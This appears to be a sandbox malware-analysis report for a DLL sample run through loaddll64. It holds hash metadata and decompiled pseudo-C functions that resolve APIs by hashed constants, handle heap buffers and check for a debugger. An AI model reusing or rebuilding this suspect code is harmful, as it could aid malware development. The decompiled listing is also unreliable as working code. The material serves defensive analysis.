                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: File$AddressAllocExitLockNamedPeekPipeProcProcessVirtual
                          • String ID: 6$662
                          • API String ID: 1002299123-1739385493
                          • Opcode ID: 61df2113f86e00cbc328842b638f91bd404d7e04f205a54db81927e6c79994c6
                          • Instruction ID: b936c9b2a307f214f659a38cbf4228910a0e78748f4e0c6bba8d3c1a5cb74e85
                          • Opcode Fuzzy Hash: 61df2113f86e00cbc328842b638f91bd404d7e04f205a54db81927e6c79994c6
                          • Instruction Fuzzy Hash: 46627572605B8486EB59CF29E4987ED33A8F789B88F05413ACE4E4B798DF39D540CB10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 35%
                          			E0000027E27ED3716DF0(long long __rbx, intOrPtr* __rcx, long long __rdx) {
                          				void* __rdi;
                          				void* __rsi;
                          				void* __rbp;
                          				void* _t96;
                          				void* _t116;
                          				void* _t121;
                          				intOrPtr _t123;
                          				void* _t130;
                          				char _t131;
                          				void* _t156;
                          				long long* _t198;
                          				long long* _t199;
                          				long long* _t201;
                          				char* _t218;
                          				char* _t219;
                          				long _t252;
                          				intOrPtr* _t253;
                          				long _t255;
                          				void* _t260;
                          				char* _t262;
                          				long long _t263;
                          				signed long long _t269;
                          				void* _t271;
                          				void* _t272;
                          				void* _t292;
                          				void* _t293;
                          				long _t300;
                          				long _t305;
                          				void* _t307;
                          
                          				_t292 = _t271;
                          				 *((long long*)(_t292 + 8)) = __rbx;
                          				 *((long long*)(_t292 + 0x10)) = __rdx;
                          				_t272 = _t271 - 0x40;
                          				r14d =  *0xd371d450;
                          				_t253 = __rcx;
                          				 *((long long*)(_t272 + 0x38)) =  *((intOrPtr*)( *0xd371d458 + 8));
                          				if (E0000027E27ED37191C8(_t121, r14d ^ 0x55e7ce26,  *((intOrPtr*)( *0xd371d458 + 8)), __rbx, __rdx, __rdx, __rcx, _t255, _t292 - 0x58, _t292 + 0x18, _t292) != 0) goto 0xd3717239;
                          				_t198 =  *_t253;
                          				 *((long long*)(_t272 + 0x98)) = _t198;
                          				 *((long long*)(_t272 + 0x30)) =  *((intOrPtr*)( *0xd371d458 + 8));
                          				if ( *((intOrPtr*)(_t272 + 0x20)) == 0) goto 0xd371703b;
                          				r13d = 0xfb849f8f;
                          				E0000027E27ED371908C(r13d, _t198,  *((intOrPtr*)( *0xd371d458 + 0x18)));
                          				if (_t198 == 0) goto 0xd3716e8f;
                          				 *_t198();
                          				goto 0xd3716e91;
                          				r8d = 1;
                          				HeapAlloc(_t307, _t305, _t300);
                          				 *((long long*)(_t272 + 0x28)) = _t198;
                          				if (_t198 == 0) goto 0xd371722f;
                          				0xd37147b0();
                          				_t262 = _t198;
                          				if ( *_t262 == 0x20) goto 0xd3716edc;
                          				if ( *_t262 != 9) goto 0xd3716ee1;
                          				_t263 = _t262 + 1;
                          				goto 0xd3716ed0;
                          				if ( *_t263 == 0) goto 0xd3716f74;
                          				E0000027E27ED371908C(r13d, _t198,  *((intOrPtr*)( *0xd371d458 + 0x18)));
                          				if (_t198 == 0) goto 0xd3716f03;
                          				 *_t198();
                          				goto 0xd3716f05;
                          				asm("cdq");
                          				_t15 = _t198 + 1; // 0x1
                          				r8d = _t15;
                          				HeapAlloc(_t293, _t252, _t255);
                          				if (_t198 == 0) goto 0xd3716f76;
                          				_t130 =  *_t263;
                          				if (_t130 == 0) goto 0xd3716f46;
                          				if (_t130 == 0x20) goto 0xd3716f42;
                          				_t218 = _t263 + 1;
                          				_t131 =  *_t218;
                          				if (_t131 != 0) goto 0xd3716f34;
                          				if (_t131 != 0) goto 0xd3716f48;
                          				if (_t218 == 0) goto 0xd3716f62;
                          				 *_t218 = 0;
                          				_t219 = _t218 + 1;
                          				if ( *_t219 == 0x20) goto 0xd3716f5d;
                          				if ( *_t219 != 9) goto 0xd3716f62;
                          				goto 0xd3716f53;
                          				 *_t198 = _t263;
                          				_t199 = _t198 +  *((intOrPtr*)( *0xd371d458 + 8));
                          				if (_t219 + 1 != 0) goto 0xd3716f2a;
                          				goto 0xd3716f7e;
                          				if (0 == 0) goto 0xd3717021;
                          				E0000027E27ED371908C(0x4a75e5e7, _t199,  *((intOrPtr*)( *0xd371d458 + 0x10)));
                          				if (_t199 == 0) goto 0xd3716fa8;
                          				 *_t199();
                          				 *((long long*)(_t253 + 0x40)) =  *((intOrPtr*)(_t272 + 0x28));
                          				 *((long long*)(_t253 + 0x48)) =  *((intOrPtr*)(_t272 + 0x90));
                          				 *((intOrPtr*)(_t253 + 0x50)) = sil;
                          				if ( *((char*)(_t253 + 0x70)) == 0) goto 0xd3716fcb;
                          				 *((char*)(_t253 + 0x70)) = 0;
                          				asm("lock and dword [edi+0x2c], 0xfffffffe");
                          				E0000027E27ED371908C(0x8d72aad2, _t199,  *((intOrPtr*)( *0xd371d458 + 0x10)));
                          				if (_t199 == 0) goto 0xd3716fea;
                          				 *_t199();
                          				if ( *((intOrPtr*)(_t253 + 0x40)) == 0) goto 0xd3717010;
                          				HeapFree(_t260, ??);
                          				HeapFree(??, ??, ??);
                          				goto 0xd3717040;
                          				HeapFree(??, ??, ??);
                          				HeapFree(??, ??, ??);
                          				if (0x57 != 0) goto 0xd371723e;
                          				if (E0000027E27ED37191C8(0, r14d ^ 0x881e33f6, _t199,  *((intOrPtr*)(_t272 + 0x30)),  *((intOrPtr*)(_t272 + 0x88)),  *((intOrPtr*)(_t272 + 0x20)), _t253, _t198, _t272 + 0x20, _t272 + 0x90, _t292) != 0) goto 0xd3717239;
                          				_t96 = E0000027E27ED371672C( *((intOrPtr*)(_t272 + 0x20)),  *((intOrPtr*)(_t272 + 0x20)), _t272 + 0x98);
                          				_t123 =  *((intOrPtr*)(_t272 + 0x98));
                          				if (_t96 != 0) goto 0xd37170a8;
                          				if (_t123 == 0) goto 0xd3717239;
                          				 *((intOrPtr*)(_t253 + 0x28)) = _t123;
                          				if (E0000027E27ED37191C8(_t123, r14d ^ 0xa2dd2342, _t199,  *((intOrPtr*)(_t272 + 0x30)),  *((intOrPtr*)(_t272 + 0x88)),  *((intOrPtr*)(_t272 + 0x20)), _t253, _t198, _t272 + 0x20, _t272 + 0x90, _t292) != 0) goto 0xd3717166;
                          				_t46 = _t199 + 0x10; // 0x10
                          				_t116 = _t46;
                          				_t156 =  <  ?  *((void*)(_t272 + 0x90)) : _t116;
                          				E0000027E27ED371908C(0x4a75e5e7, _t199,  *((intOrPtr*)( *0xd371d458 + 0x10)));
                          				if (_t199 == 0) goto 0xd3717109;
                          				 *_t199();
                          				r8d = _t156;
                          				0xd37147b0();
                          				if (_t156 - _t116 >= 0) goto 0xd3717134;
                          				r8d = _t116 - _t156;
                          				0xd371487a();
                          				E0000027E27ED371908C(0x8d72aad2, _t199,  *((intOrPtr*)( *0xd371d458 + 0x10)));
                          				if (_t199 == 0) goto 0xd371714e;
                          				 *_t199();
                          				HeapFree(??, ??, ??);
                          				_t269 =  *((intOrPtr*)(_t272 + 0x88));
                          				r14d = r14d ^ 0x1a1a0866;
                          				if (E0000027E27ED37191C8(_t123, r14d, _t199,  *((intOrPtr*)(_t272 + 0x30)), _t269,  *((intOrPtr*)(_t272 + 0x20)), _t253, _t198, _t272 + 0x20, _t272 + 0x90, _t292) != 0) goto 0xd371723e;
                          				if (E0000027E27ED371672C( *((intOrPtr*)(_t272 + 0x20)),  *((intOrPtr*)(_t272 + 0x20)), _t272 + 0x98) == 0) goto 0xd371723e;
                          				if ( *((intOrPtr*)(_t272 + 0x98)) == 0) goto 0xd371723e;
                          				E0000027E27ED371908C(0x4a75e5e7, _t199,  *((intOrPtr*)( *0xd371d458 + 0x10)));
                          				if (_t199 == 0) goto 0xd37171de;
                          				 *_t199();
                          				E0000027E27ED371908C(0x9c66d81c, _t199,  *((intOrPtr*)( *0xd371d458 + 0x18)));
                          				if (_t199 == 0) goto 0xd37171f8;
                          				 *_t199();
                          				_t201 =  *((intOrPtr*)(_t272 + 0x28)) + _t269 * 0x23c34600;
                          				 *((long long*)(_t272 + 0x28)) = _t201;
                          				 *((long long*)(_t253 + 0x30)) = _t201;
                          				E0000027E27ED371908C(0x8d72aad2, _t201,  *((intOrPtr*)( *0xd371d458 + 0x10)));
                          				if (_t201 == 0) goto 0xd371723e;
                          				 *_t201();
                          				goto 0xd371723e;
                          				goto 0xd3717040;
                          				return 1;
                          			}
































                          0x27ed3716df0
                          0x27ed3716df3
                          0x27ed3716df7
                          0x27ed3716e06
                          0x27ed3716e11
                          0x27ed3716e22
                          0x27ed3716e36
                          0x27ed3716e42
                          0x27ed3716e54
                          0x27ed3716e5b
                          0x27ed3716e63
                          0x27ed3716e6b
                          0x27ed3716e75
                          0x27ed3716e7e
                          0x27ed3716e86
                          0x27ed3716e8b
                          0x27ed3716e8d
                          0x27ed3716e98
                          0x27ed3716e9d
                          0x27ed3716ea6
                          0x27ed3716eae
                          0x27ed3716ebd
                          0x27ed3716ec9
                          0x27ed3716ed4
                          0x27ed3716eda
                          0x27ed3716edc
                          0x27ed3716edf
                          0x27ed3716ee5
                          0x27ed3716ef2
                          0x27ed3716efa
                          0x27ed3716eff
                          0x27ed3716f01
                          0x27ed3716f05
                          0x27ed3716f0f
                          0x27ed3716f0f
                          0x27ed3716f17
                          0x27ed3716f25
                          0x27ed3716f2a
                          0x27ed3716f32
                          0x27ed3716f37
                          0x27ed3716f39
                          0x27ed3716f3c
                          0x27ed3716f40
                          0x27ed3716f44
                          0x27ed3716f4b
                          0x27ed3716f4d
                          0x27ed3716f50
                          0x27ed3716f56
                          0x27ed3716f5b
                          0x27ed3716f60
                          0x27ed3716f62
                          0x27ed3716f67
                          0x27ed3716f70
                          0x27ed3716f72
                          0x27ed3716f80
                          0x27ed3716f8f
                          0x27ed3716f9f
                          0x27ed3716fa6
                          0x27ed3716fb5
                          0x27ed3716fb9
                          0x27ed3716fbd
                          0x27ed3716fc5
                          0x27ed3716fc7
                          0x27ed3716fcb
                          0x27ed3716fd9
                          0x27ed3716fe1
                          0x27ed3716fe8
                          0x27ed3716fed
                          0x27ed3716ffc
                          0x27ed371700a
                          0x27ed371701f
                          0x27ed371702d
                          0x27ed371704d
                          0x27ed3717055
                          0x27ed371707b
                          0x27ed3717090
                          0x27ed3717095
                          0x27ed371709e
                          0x27ed37170a2
                          0x27ed37170ab
                          0x27ed37170cb
                          0x27ed37170db
                          0x27ed37170db
                          0x27ed37170eb
                          0x27ed37170f8
                          0x27ed3717100
                          0x27ed3717107
                          0x27ed3717112
                          0x27ed3717117
                          0x27ed371711e
                          0x27ed371712c
                          0x27ed371712f
                          0x27ed371713d
                          0x27ed3717145
                          0x27ed371714c
                          0x27ed3717158
                          0x27ed371715e
                          0x27ed3717166
                          0x27ed3717189
                          0x27ed37171a5
                          0x27ed37171b4
                          0x27ed37171cd
                          0x27ed37171d5
                          0x27ed37171dc
                          0x27ed37171e7
                          0x27ed37171ef
                          0x27ed37171f6
                          0x27ed371720c
                          0x27ed371720f
                          0x27ed3717214
                          0x27ed371721c
                          0x27ed3717224
                          0x27ed371722b
                          0x27ed371722d
                          0x27ed3717234
                          0x27ed3717257

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.402437262.0000027ED3710000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027ED3710000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_27ed3710000_loaddll64.jbxd
                          Similarity
                          • API ID: Heap$Free$Alloc$ErrorLast
                          • String ID: uJ$uJ$uJ
                          • API String ID: 1659099196-303439786
                          • Opcode ID: 0009eb8cc0e7ac2dbfe6d5ea119122e533f5930bbc08966e566b1206be97e56d
                          • Instruction ID: 03970c830be018871cacf0162314253c376d3d7017cd41f6a2c56e5f032c5f65
                          • Opcode Fuzzy Hash: 0009eb8cc0e7ac2dbfe6d5ea119122e533f5930bbc08966e566b1206be97e56d
                          • Instruction Fuzzy Hash: 69C18E33609F85C5EE70DB62A84839B63A8F78EB84F4A50A59E4D437C6DF38C546C760
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 15%
                          			E0000027E27ED3715638(long long __rbx, long long __rcx, void* __rdx, long long __r8, void* __r11) {
                          				void* __rbp;
                          				signed long long _t89;
                          				signed long long _t109;
                          				signed long long _t122;
                          				signed long long _t131;
                          				intOrPtr _t141;
                          				void* _t167;
                          				void* _t186;
                          				long long* _t187;
                          				long long _t188;
                          				long long _t190;
                          				long long _t192;
                          				long long* _t193;
                          				long long* _t234;
                          				long _t237;
                          				long _t240;
                          				void* _t243;
                          				void* _t248;
                          				void* _t249;
                          				void* _t264;
                          				void* _t269;
                          				void* _t270;
                          				long _t273;
                          				long _t277;
                          				void* _t281;
                          
                          				_t269 = __r11;
                          				_t192 = __rbx;
                          				_t186 = _t248;
                          				 *((long long*)(_t186 + 0x10)) = __rbx;
                          				 *((intOrPtr*)(_t186 + 0x20)) = r9d;
                          				 *((long long*)(_t186 + 0x18)) = __r8;
                          				 *((long long*)(_t186 + 8)) = __rcx;
                          				_t249 = _t248 - 0x50;
                          				_t244 =  *0xd371d458;
                          				_t187 =  *0xd371d448;
                          				 *((long long*)(_t249 + 0x38)) = _t187;
                          				E0000027E27ED371908C(0x38e683e4, _t187,  *((intOrPtr*)( *0xd371d458 + 0x18)));
                          				if (_t187 == _t237) goto 0xd3715691;
                          				_t9 = _t237 + 0xa; // 0xa
                          				 *_t187();
                          				E0000027E27ED371908C(0x9c66d81c, _t187,  *((intOrPtr*)( *0xd371d458 + 0x18)));
                          				if (_t187 == _t237) goto 0xd37156ab;
                          				 *_t187();
                          				_t12 = _t249 + 0x30; // -126
                          				_t89 = E0000027E27ED3715BA4(_t12);
                          				_t13 = _t249 + 0x30; // -126
                          				r11d = _t89;
                          				r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
                          				_t18 = _t269 + 3; // 0x3
                          				E0000027E27ED37113EC(_t18, _t187, __rbx, _t13);
                          				 *((long long*)(_t249 + 0x40)) = _t187;
                          				if (_t187 == _t237) goto 0xd37159e0;
                          				r12d = 0xfb849f8f;
                          				E0000027E27ED371908C(r12d, _t187,  *((intOrPtr*)( *0xd371d458 + 0x18)));
                          				if (_t187 == _t237) goto 0xd3715711;
                          				 *_t187();
                          				goto 0xd3715713;
                          				E0000027E27ED371908C(r12d, _t187,  *((intOrPtr*)(_t244 + 0x18)));
                          				if (_t187 == _t237) goto 0xd371572e;
                          				r13d =  *_t187();
                          				goto 0xd3715731;
                          				r13d = 0;
                          				_t23 = _t192 + 7; // 0x7
                          				r8d = _t273 + _t23;
                          				HeapAlloc(_t281, _t277, _t273);
                          				if (_t187 == _t237) goto 0xd37159d2;
                          				_t24 = _t192 + 1; // 0x1
                          				r8d = _t24;
                          				0xd37147b0();
                          				if ( *((intOrPtr*)(_t249 + 0xa0)) == _t237) goto 0xd37157a3;
                          				if ( *((intOrPtr*)(_t249 + 0xa8)) == 0) goto 0xd37157a3;
                          				_t188 =  *((intOrPtr*)(_t249 + 0x38));
                          				r8d = 6;
                          				0xd37147b0();
                          				_t32 = _t273 + 1; // 0x1
                          				r8d = _t32;
                          				0xd37147b0();
                          				_t234 = _t187;
                          				if (E0000027E27ED371A238(_t9, 0, _t167,  *((intOrPtr*)(_t249 + 0xa8)), _t192,  *((intOrPtr*)(_t249 + 0x90)), _t234, _t249 + 0x48, _t264) != 0) goto 0xd37159c4;
                          				_t193 =  *((intOrPtr*)(_t249 + 0xb0));
                          				 *_t193 =  *((intOrPtr*)(_t249 + 0x48));
                          				E0000027E27ED371908C(0xfb849f8f, _t188,  *((intOrPtr*)(_t244 + 0x18)));
                          				if (_t188 == _t237) goto 0xd37157ea;
                          				 *_t188();
                          				goto 0xd37157ec;
                          				 *((intOrPtr*)(_t193 + 0x10)) = 0;
                          				_t41 = _t234 + 0x34; // 0x34
                          				r8d = _t41;
                          				 *((intOrPtr*)(_t193 + 0x14)) = 1;
                          				HeapAlloc(_t270, _t237, _t240);
                          				if (_t188 == _t237) goto 0xd37159b6;
                          				_t43 = _t249 + 0x30; // 0xfb849fcf
                          				_t109 = E0000027E27ED3715BA4(_t43);
                          				_t44 = _t249 + 0x30; // 0xfb849fcf
                          				r11d = _t109;
                          				r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
                          				_t49 = _t269 + 3; // 0x3
                          				E0000027E27ED37113EC(_t49, _t188, _t193, _t44);
                          				if (_t188 == _t237) goto 0xd37159a8;
                          				0xd371b158();
                          				HeapFree(_t243, ??);
                          				 *((long long*)(_t193 + 8)) = _t188;
                          				if ( *((intOrPtr*)(_t249 + 0xa0)) == _t237) goto 0xd37159fa;
                          				_t141 =  *((intOrPtr*)(_t249 + 0xa8));
                          				if (_t141 == 0) goto 0xd37159fa;
                          				r8d = _t141;
                          				_t190 = _t193 + 0x28;
                          				 *((long long*)(_t249 + 0x20)) = _t190;
                          				if (E0000027E27ED3717CF4(_t190, _t193,  *((intOrPtr*)(_t249 + 0x90)),  *((intOrPtr*)(_t249 + 0xa0)), _t188, _t193 + 0x18) != 0) goto 0xd37159a8;
                          				r15d = 0x77;
                          				 *((intOrPtr*)(_t193 + 0x2c)) = 1;
                          				HeapAlloc(??, ??, ??);
                          				if (_t190 == _t237) goto 0xd37159a3;
                          				_t62 = _t249 + 0x30; // 0xfb849fcf
                          				_t122 = E0000027E27ED3715BA4(_t62);
                          				_t63 = _t249 + 0x30; // 0xfb849fcf
                          				r11d = _t122;
                          				r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
                          				_t68 = _t269 + 3; // 0x3
                          				_t131 = E0000027E27ED37113EC(_t68, _t190, _t193, _t63);
                          				 *((long long*)(_t249 + 0x48)) = _t190;
                          				if (_t190 == _t237) goto 0xd3715995;
                          				0xd371b158();
                          				r11d = _t131;
                          				r15d = r15d - r11d;
                          				 *((long long*)(_t249 + 0x20)) =  *((intOrPtr*)(_t249 + 0x38)) + 0x27ed372129f;
                          				0xd371b158();
                          				 *((long long*)(_t193 + 0x20)) = _t190;
                          				goto 0xd37159b9;
                          				HeapFree(??, ??, ??);
                          				HeapFree(??, ??, ??);
                          				HeapFree(??, ??, ??);
                          				HeapFree(??, ??, ??);
                          				HeapFree(??, ??, ??);
                          				return 2;
                          			}




























                          0x27ed3715638
                          0x27ed3715638
                          0x27ed3715638
                          0x27ed371563b
                          0x27ed371563f
                          0x27ed3715643
                          0x27ed3715647
                          0x27ed3715656
                          0x27ed371565a
                          0x27ed3715661
                          0x27ed3715678
                          0x27ed371567f
                          0x27ed3715687
                          0x27ed371568c
                          0x27ed371568f
                          0x27ed371569a
                          0x27ed37156a2
                          0x27ed37156a9
                          0x27ed37156ab
                          0x27ed37156b0
                          0x27ed37156b5
                          0x27ed37156ba
                          0x27ed37156d4
                          0x27ed37156d7
                          0x27ed37156db
                          0x27ed37156e3
                          0x27ed37156eb
                          0x27ed37156f5
                          0x27ed37156fe
                          0x27ed3715706
                          0x27ed371570b
                          0x27ed371570f
                          0x27ed371571a
                          0x27ed3715722
                          0x27ed3715729
                          0x27ed371572c
                          0x27ed371572e
                          0x27ed3715731
                          0x27ed3715731
                          0x27ed371573b
                          0x27ed3715747
                          0x27ed371574d
                          0x27ed371574d
                          0x27ed3715757
                          0x27ed371576b
                          0x27ed3715774
                          0x27ed3715776
                          0x27ed371577b
                          0x27ed371578d
                          0x27ed3715792
                          0x27ed3715792
                          0x27ed371579e
                          0x27ed37157b0
                          0x27ed37157ba
                          0x27ed37157c0
                          0x27ed37157d2
                          0x27ed37157d9
                          0x27ed37157e1
                          0x27ed37157e6
                          0x27ed37157e8
                          0x27ed37157f1
                          0x27ed37157f4
                          0x27ed37157f4
                          0x27ed37157f8
                          0x27ed37157ff
                          0x27ed371580b
                          0x27ed3715811
                          0x27ed3715816
                          0x27ed371581b
                          0x27ed3715820
                          0x27ed371583a
                          0x27ed371583d
                          0x27ed3715841
                          0x27ed371584c
                          0x27ed3715871
                          0x27ed371587e
                          0x27ed371588c
                          0x27ed3715893
                          0x27ed3715899
                          0x27ed37158a2
                          0x27ed37158a8
                          0x27ed37158b3
                          0x27ed37158bb
                          0x27ed37158c7
                          0x27ed37158cd
                          0x27ed37158db
                          0x27ed37158e2
                          0x27ed37158ee
                          0x27ed37158f4
                          0x27ed37158f9
                          0x27ed37158fe
                          0x27ed3715903
                          0x27ed371591d
                          0x27ed3715920
                          0x27ed3715924
                          0x27ed3715929
                          0x27ed3715931
                          0x27ed3715950
                          0x27ed371595d
                          0x27ed3715968
                          0x27ed3715970
                          0x27ed3715980
                          0x27ed371598a
                          0x27ed3715993
                          0x27ed371599d
                          0x27ed37159b0
                          0x27ed37159be
                          0x27ed37159cc
                          0x27ed37159da
                          0x27ed37159f9

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.402437262.0000027ED3710000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027ED3710000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_27ed3710000_loaddll64.jbxd
                          Similarity
                          • API ID: Heap$Free$Alloc$ErrorLast
                          • String ID:
                          • API String ID: 1659099196-0
                          • Opcode ID: 8a526f4b4f4539653de5a656a5e2567e36e45d16e14d605094fa57f0b70ba07b
                          • Instruction ID: fbb6378f3a9b3b9414e7a663bed25a9e450f0896d9cf940cfc54f4c198f695e5
                          • Opcode Fuzzy Hash: 8a526f4b4f4539653de5a656a5e2567e36e45d16e14d605094fa57f0b70ba07b
                          • Instruction Fuzzy Hash: ECA1D337218E81C6DF24DB26D40829B63A9F7CEBD4F465111AE4E4779ADE38C505C750
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 65%
                          			E00007FF87FF88C07E374(void* __ecx, intOrPtr __edx, void* __esp, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
                          				void* __rdi;
                          				void* _t36;
                          				int _t40;
                          				void* _t43;
                          				void* _t44;
                          				intOrPtr _t52;
                          				signed long long _t62;
                          				long long _t65;
                          				_Unknown_base(*)()* _t85;
                          				void* _t89;
                          				void* _t90;
                          				void* _t92;
                          				signed long long _t93;
                          				struct _EXCEPTION_POINTERS* _t99;
                          
                          				_t45 = __ecx;
                          				 *((long long*)(_t92 + 0x10)) = __rbx;
                          				 *((long long*)(_t92 + 0x18)) = __rsi;
                          				_t3 = _t92 - 0x4f0; // -1288
                          				_t90 = _t3;
                          				_t93 = _t92 - 0x5f0;
                          				_t62 =  *0x8c0b3760; // 0xa7d9df492a3c
                          				 *(_t90 + 0x4e0) = _t62 ^ _t93;
                          				_t52 = r8d;
                          				_t44 = __ecx;
                          				if (__ecx == 0xffffffff) goto 0x8c07e3b3;
                          				E00007FF87FF88C07BC04(_t36);
                          				_t5 = _t93 + 0x70; // 0x58
                          				r8d = 0x98;
                          				E00007FF87FF88C07C440(__ecx, 0, _t52, __esp, _t5, __rdx, _t85, __r8);
                          				_t6 = _t90 + 0x10; // -1272
                          				r8d = 0x4d0;
                          				E00007FF87FF88C07C440(_t45, 0, _t52, __esp, _t6, __rdx, _t85, __r8);
                          				_t7 = _t93 + 0x70; // 0x58
                          				 *((long long*)(_t93 + 0x48)) = _t7;
                          				_t10 = _t90 + 0x10; // -1272
                          				_t65 = _t10;
                          				 *((long long*)(_t93 + 0x50)) = _t65;
                          				__imp__RtlCaptureContext();
                          				r8d = 0;
                          				__imp__RtlLookupFunctionEntry();
                          				if (_t65 == 0) goto 0x8c07e446;
                          				 *(_t93 + 0x38) =  *(_t93 + 0x38) & 0x00000000;
                          				_t16 = _t93 + 0x60; // 0x48
                          				 *((long long*)(_t93 + 0x30)) = _t16;
                          				_t19 = _t93 + 0x58; // 0x40
                          				 *((long long*)(_t93 + 0x28)) = _t19;
                          				_t21 = _t90 + 0x10; // -1272
                          				 *((long long*)(_t93 + 0x20)) = _t21;
                          				__imp__RtlVirtualUnwind();
                          				 *((long long*)(_t90 + 0x108)) =  *((intOrPtr*)(_t90 + 0x508));
                          				_t25 = _t90 + 0x508; // 0x0
                          				 *((intOrPtr*)(_t93 + 0x70)) = __edx;
                          				 *((long long*)(_t90 + 0xa8)) = _t25 + 8;
                          				 *((long long*)(_t90 - 0x80)) =  *((intOrPtr*)(_t90 + 0x508));
                          				 *((intOrPtr*)(_t93 + 0x74)) = _t52;
                          				_t40 = IsDebuggerPresent();
                          				SetUnhandledExceptionFilter(_t85, _t89);
                          				if (UnhandledExceptionFilter(_t99) != 0) goto 0x8c07e4a8;
                          				if (_t40 != 0) goto 0x8c07e4a8;
                          				if (_t44 == 0xffffffff) goto 0x8c07e4a8;
                          				_t43 = E00007FF87FF88C07BC04(_t42);
                          				E00007FF87FF88C086D80();
                          				return _t43;
                          			}

















                          0x7ff88c07e374
                          0x7ff88c07e374
                          0x7ff88c07e379
                          0x7ff88c07e382
                          0x7ff88c07e382
                          0x7ff88c07e38a
                          0x7ff88c07e391
                          0x7ff88c07e39b
                          0x7ff88c07e3a2
                          0x7ff88c07e3a7
                          0x7ff88c07e3ac
                          0x7ff88c07e3ae
                          0x7ff88c07e3b5
                          0x7ff88c07e3ba
                          0x7ff88c07e3c0
                          0x7ff88c07e3c7
                          0x7ff88c07e3cb
                          0x7ff88c07e3d1
                          0x7ff88c07e3d6
                          0x7ff88c07e3db
                          0x7ff88c07e3e4
                          0x7ff88c07e3e4
                          0x7ff88c07e3e8
                          0x7ff88c07e3ed
                          0x7ff88c07e402
                          0x7ff88c07e405
                          0x7ff88c07e40e
                          0x7ff88c07e410
                          0x7ff88c07e416
                          0x7ff88c07e423
                          0x7ff88c07e42b
                          0x7ff88c07e430
                          0x7ff88c07e435
                          0x7ff88c07e439
                          0x7ff88c07e440
                          0x7ff88c07e44d
                          0x7ff88c07e454
                          0x7ff88c07e45f
                          0x7ff88c07e463
                          0x7ff88c07e471
                          0x7ff88c07e475
                          0x7ff88c07e479
                          0x7ff88c07e483
                          0x7ff88c07e496
                          0x7ff88c07e49a
                          0x7ff88c07e49f
                          0x7ff88c07e4a3
                          0x7ff88c07e4b2
                          0x7ff88c07e4ce

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                          • String ID:
                          • API String ID: 1239891234-0
                          • Opcode ID: 07dcb6749cf727804a818c63ef9eb218394f6ec07e419224f6cd5021fde535cb
                          • Instruction ID: 0c7b21463160054d03d981d111d5a7f7e7897e70b88482e26c61dd0242a9fa81
                          • Opcode Fuzzy Hash: 07dcb6749cf727804a818c63ef9eb218394f6ec07e419224f6cd5021fde535cb
                          • Instruction Fuzzy Hash: 44316036608B8186EB64CF25E8443AE73A4FB997D4F504136EA9D47BA8DF3CC555CB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 38%
                          			E0000027E27ED3717FD4(signed int __edx, char* __rax, long long __rbx, void* __rcx, long long __rsi, void* __r8) {
                          				void* __rdi;
                          				signed int _t34;
                          				void* _t66;
                          				char* _t104;
                          				void* _t131;
                          				char* _t134;
                          				long long _t140;
                          				void* _t141;
                          				void* _t143;
                          				void* _t144;
                          				signed long long _t156;
                          				void* _t158;
                          
                          				_t106 = __rbx;
                          				_t104 = __rax;
                          				 *((long long*)(_t143 + 8)) = __rbx;
                          				 *((long long*)(_t143 + 0x18)) = _t140;
                          				 *((long long*)(_t143 + 0x20)) = __rsi;
                          				_t144 = _t143 - 0x40;
                          				r14d =  *0xd371d450;
                          				_t141 = __rcx;
                          				_t137 =  *((intOrPtr*)( *0xd371d458 + 8));
                          				r12d = 0;
                          				_t34 = r14d ^ __edx;
                          				if (_t34 == 0x139d2b8d) goto 0xd37180ef;
                          				if (_t34 == 0x15f5a8c2) goto 0xd3718115;
                          				if (_t34 == 0x2f77acf9) goto 0xd37180e9;
                          				if (_t34 == 0x48e12436) goto 0xd37181c8;
                          				if (_t34 == 0x4d382929) goto 0xd3718164;
                          				if (_t34 == 0xb016dc39) goto 0xd37180c9;
                          				if (_t34 == 0xb057dfc9) goto 0xd371805b;
                          				goto 0xd371821b;
                          				if (r9d == 0) goto 0xd37180bf;
                          				E0000027E27ED37185CC(r9d, __rbx, __r8,  *((intOrPtr*)( *0xd371d458 + 8)), _t158);
                          				if (_t104 == 0) goto 0xd37180b5;
                          				 *(_t144 + 0x20) =  *(_t144 + 0x20) & _t156;
                          				if (E0000027E27ED37114B8(_t104, _t106, _t141, 0x27ed37134a4,  *((intOrPtr*)( *0xd371d458 + 8)), _t104,  *((intOrPtr*)(_t144 + 0x80))) != 0) goto 0xd37180a2;
